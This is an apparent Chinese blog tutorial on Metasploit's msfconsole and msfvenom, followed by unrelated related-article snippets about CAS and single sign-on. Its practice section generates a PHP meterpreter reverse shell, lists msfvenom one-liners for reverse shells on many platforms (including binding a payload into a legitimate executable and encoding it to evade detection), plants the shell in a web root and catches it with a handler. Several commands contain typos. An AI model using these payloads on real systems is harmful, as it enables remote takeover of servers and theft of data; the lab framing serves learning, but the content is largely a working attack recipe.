kali msfconsole命令详解以及靶机攻破实战

article/2025/9/29 14:49:49

一.msfconsole介绍

msfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机…这边仅供学习使用

msfconsole

在这里插入图片描述

注:默认kali 预装了metasploit-framework,即msfconsole命令,如果没有或提示:

msfconsole:commad not found
请自行安装:apt install metasploit-framework

生成payload时常见参数说明:

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled < length> 为payload预先指定一个NOP滑动长度
-f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64
–platform < platform> 指定payload的目标平台
-s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小
-b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 '\x0f''\x00';
-i, –iterations < count> 指定payload的编码次数
-c, –add-code < path> 指定一个附加的win32 shellcode文件
-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out < path> 指定创建好的payload的存放位置
-v, –var-name < name> 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表

msf控制台参数运用

- banner #这个主要是查看metasploit的版本信息,利用模块数量、payload数量等等。
- use #这个是使用参数。如你要使用到某个利用模块,payload等,那么就要使用到use参数
- Search #当你使用msfconsole的时候,你会用到各种漏洞模块、各种插件等等。所以search命令就很重要。使用命令 `help search` 可以查看具体使用方法;其他使用方法:查mysql:`search name:mysql`; 查joomla:`search joomla`;查ubutu漏洞:`searchsploit ubuntu 16.04`;查ms08-067漏洞:`search ms08-067`......
- show #这个命令用的很多。如果单纯的输入show,那么就会显示出所有的payload,利用模块,post模块,插件等等。但是一般我们都不这么使用。如果要显示利用模块,那么就输入show exploits。如果要显示payload,那么就输入show payloads。

参考博文地址:https://blog.csdn.net/zx77588023/article/details/119063685

二.实战

  1. 准备测试服务器及测试服务器环境:
    centos7 服务器;
    php运行环境,lnmp或者lamp,可简易化安装:
  • 小皮控制面板:yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh
  • 宝塔控制面板:yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484bec
  1. 通过msf制作反弹链接,即php 渗透文件:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.129 lport=8080 -o venom.php

解析截图:
在这里插入图片描述
生成的venom.php文件内容大概如下:
在这里插入图片描述
注:使用文件时需去掉红色框中的内容/*,即可正常使用!

攻击其他平台的渗透文件生成命令示例如下;注意,命令中的

Your IP Address

需要自行替换为攻击主机的IP,

Your Port to Connect On

替换为你设置的端口

  • 普通生成:msfvenom -p windows/meterpreter/reverse_tcp -f exe -o C:\back.exe
  • 编码处理型:msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_na -f exe -o C:\back.exe
  • 捆绑:msfvenom -p windows/meterpreter/reverse_tcp -platform windows -a x86 -x C:\nomal.exe -k -f exe -o C:\shell.exe
  • Windows: msfvenom -platform windows -a x86 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe
  • Linux: msfvenom -p linux/*86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
  • MAC: msfvenom -p osx/x86/shelLreverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
  • PHP: msfvenom -p php/meterpreterreverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  • AsP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
  • Aspx: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspx
  • JSP: msfvenom - p java/jsp_shellreverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
  • War:msfvenom -p java/jsp_shelLreverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
  • Bash: msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
  • Perl: msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
  • Python: msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
  1. 将生成好的渗透文件上传至服务器,这边上传走的是正常的上传文件,一般情况下需要利用服务器,或者网站等一些漏洞进行渗透注入,该教程暂不演示;这边生成的是venom.php php网站目录文件,所以上传到自建的网站的根目录下!
  2. 打开另外一个终端,启动msf控制面板,启动如文首一内的msfconsole简介,在msf控制面板依次输入以下命令:
   use exploit/multi/handler #使用监听模块set payload php/meterpreter/reverse_tcp #设置tcp_php的反弹链接,和渗透文件的payload保持一致set lhost 192.168.78.129 #本机ip,与生成渗透文件的host保持一致set lport 8080 #本机端口,与生成渗透文件保持一致exploit 

执行完成后会出现以下界面,然后静待有人访问网站;

在这里插入图片描述
访问站点链接:
在这里插入图片描述
当有人访问了我们上传的venom.php时,会出现如下界面,进入到meterpreter控制台:
在这里插入图片描述
上面表示我们已经成功控链接到网站,可自行尝试读取!以下为执行的一些命令尝试:
在这里插入图片描述

教程演示仅做测学习!!!!


http://chatgpt.dhexx.cn/article/5nS73yrW.shtml

相关文章

内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

Msfconsole工具 概括&#xff1a; Msfconsole简称&#xff08;msf&#xff09;是一款常用的渗透测试工具&#xff0c;包含了常见的漏洞利用模块和生成各种木马&#xff0c;方便于安全测试人员的使用. 目录&#xff1a; Msfconsole的使用&#xff1a; 第一步&#xff1a;进行端…

SSO是什么?CAS是什么?

SSO SSO是目前比较流行的服务于企业业务整合的解决方案之一&#xff0c; SSO 使得在多个应用系统中&#xff0c;用户只需要 登录一次 就可以访问所有相互信任的应用系统。 CAS CAS 是 Yale 大学发起的一个企业级的、开源的项目&#xff0c;旨在为 Web 应用系统提供一种可靠的…

什么是CAS?

CAS 是 Yale &#xff08;耶鲁&#xff09;大学发起的一个开源项目&#xff0c;旨在为 Web 应用系统提供一种可靠的单点登录方法&#xff0c;CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目。CAS 具有以下特点&#xff1a; 【1】开源的企业级单点登录解决方案。 【2】CAS S…

什么是CAS和AQS

什么是CAS和AQS CAS理解概念ABA 问题 AQS理解获取同步状态AQS源码分析获取锁释放锁 CAS是一种乐观锁&#xff0c;通过在修改数据时&#xff0c;通过和原来的值进行比较&#xff0c;判断是否有被其他人改变。然后AQS是有一个对列&#xff0c;当线程获取不到锁的时候&#xff0c;…

cas 计算器 android,GeoGebra CAS计算器

GeoGebra CAS计算器app是一款非常不错的几何cas计算工具&#xff0c;支持精确解,展开,分解因式等计算功能&#xff0c;图形分解解析&#xff0c;坐标轴&#xff0c;曲线&#xff0c;参数信息详细&#xff0c;需要的可以下载GeoGebra CAS计算器app使用&#xff01; 软件简介 求解…

【Java里的CAS机制】什么是CAS,CAS机制

CAS 一、什么是CAS二、CAS的三大缺点ABA问题 一、什么是CAS 前面两篇文章提到CAS操作&#xff0c;那么CAS操作到底是什么东西呢&#xff1f;今天我们来了解一下CAS机制 CAS&#xff08;Compare-And-Swap&#xff09;,它是一条CPU并发原语&#xff0c;用于判断内存中某个位置的…

CAS机制是什么?

首先我们需要了解为什么有CAS机制的存在&#xff1f;那我们就不得不先知道互斥同步和非阻塞同步。 互斥同步 互斥同步面临的主要问题是进行线程阻塞和唤醒带来的性能开销&#xff0c;因此这种同步也叫阻塞同步。互斥同步属于悲观的并发策略&#xff0c;其总是认为只要不做同步…

CAS单点登录

简介 CAS是Central Authentication Service的缩写&#xff0c;中央认证服务&#xff0c;一种独立开放指令协议。CAS 是 耶鲁大学&#xff08;Yale University&#xff09;发起的一个开源项目&#xff0c;旨在为 Web 应用系统提供一种可靠的单点登录方法&#xff0c;CAS 在 200…

什么是CAS(乐观锁)

本文讲解CAS机制&#xff0c;主要是因为最近准备面试题&#xff0c;发现这个问题在面试中出现的频率非常的高&#xff0c;因此把自己学习过程中的一些理解记录下来&#xff0c;希望能对大家也有帮助。 什么是悲观锁、乐观锁&#xff1f;在java语言里&#xff0c;总有一些名词看…

CAS机制

文章目录 1、什么是CAS&#xff1f;2、CAS实现原子操作的3大问题&#xff1f;3、Unsafe类4、AtomicReference5、CAS——自旋锁 1、什么是CAS&#xff1f; CAS的全称是 Compare And Swap&#xff08;比较再交换&#xff0c;确切一点称之为&#xff1a;比较并且相同再做交换&…

Java 中 CAS 是什么,有哪些实际应用场景

CAS 是什么 CAS&#xff08;Compare And Swap&#xff09;是一种并发编程中的原子操作&#xff0c;用于实现多线程之间的同步。在 Java 中&#xff0c;CAS 操作通过 sun.misc.Unsafe 类实现。 CAS 操作是一种乐观锁机制&#xff0c;它假设对于共享变量的修改操作不会引起冲突…

Java 什么是 CAS? 通俗易懂

Java 并发机制实现原子操作有两种&#xff1a; 一种是锁&#xff0c;一种是CAS。 CAS是Compare And Swap&#xff08;比较并替换&#xff09;的缩写。 java.util.concurrent.atomic中的很多类&#xff0c;如&#xff08;AtomicInteger AtomicBoolean AtomicLong等&#xff09;都…

什么是CAS?CAS有什么缺点?

文章目录 什么是CASCAS 举例说明CAS 底层实现CAS缺陷 什么是CAS CAS 的全称是 Compare And Swap 即比较交换&#xff0c;其算法核心思想如下函数&#xff1a;CAS(V,E,N) 参数&#xff1a; V 表示要更新的变量E 预期值N 新值 如果 V 值等于 E 值&#xff0c;则将 V 的值设为 …

【ceph】存储领域的CAS是什么?什么是CAS|Open CAS|缓存加速软件

目录 什么是CAS 出现原因和应用场景&#xff1a; 初始Open CAS What SPDK Block Device Open CAS Linux Whats Cache? Whats Cache Object? Cache operations Cache Configuration Cache Mode Cache line size Whats Core? Whats Cache line&#xff1f; Cach…

java常见面试考点(二十五):CAS是什么

java常见面试考点 往期文章推荐&#xff1a;   java常见面试考点&#xff08;二十&#xff09;&#xff1a;Elasticsearch 和 solr 的区别   java常见面试考点&#xff08;二十一&#xff09;&#xff1a;单点登录   java常见面试考点&#xff08;二十二&#xff09;&…

CAS是什么?彻底搞懂CAS

CAS&#xff08;Compare-And-Swap&#xff09;,它是一条CPU并发原语&#xff0c;用于判断内存中某个位置的值是否为预期值&#xff0c;如果是则更改为新的值&#xff0c;这个过程是原子的。 CAS基本原理 CAS并发原语体现在Java中就是sun.misc.Unsafe类中的各个方法。调用UnSa…

(一)CAS是什么?

前言 随着企业数字化转型的不断发展&#xff0c;应用系统越来越多&#xff0c;每个系统都有一套用户系统&#xff0c;用户在操作不同的系统时&#xff0c;需要多次登录&#xff0c;而且每个系统的账号都不一样&#xff0c;这对于用户来说&#xff0c;很不方便。这时候要做到 在…

CAS是什么

目录 没有CAS之前 使用CAS之后 CAS是什么 CAS底层原理&#xff1a;unsafe类 Unsafe new AtomicInteger().getAndIncrement()流程 CAS缺点 1 循环时间长开销很大 2 ABA问题 ABA代码演示 如何解决&#xff1f;&#xff1a;通过AtomicStampedReference版本号 3不能保…

CAS 是什么?

CAS又称 自旋锁、无锁&#xff0c;是一种乐观锁 compare and swap 的缩写 意为: 比较并交换 , 实现并发算法的常用技术 , 就是说我不用加锁 , 也能保证 ( 加锁会影响效率&#xff0c;可以考虑使用原子操作类 ) 原子性 , 当多个线程尝试使用 CAS 同时更新同一个变量时&#xf…

什么是CAS

文章目录 一、CAS是什么二、CAS 可以解决什么问题三、CAS实现原子操作的问题 一、CAS是什么 CAS的全称为compare and swap 或者compare and exchange,意思为比较和交换。CAS流程如下&#xff1a; 假设我们有一个共享变量i&#xff0c;初始值为0。我们现在要对i进行加1的操作…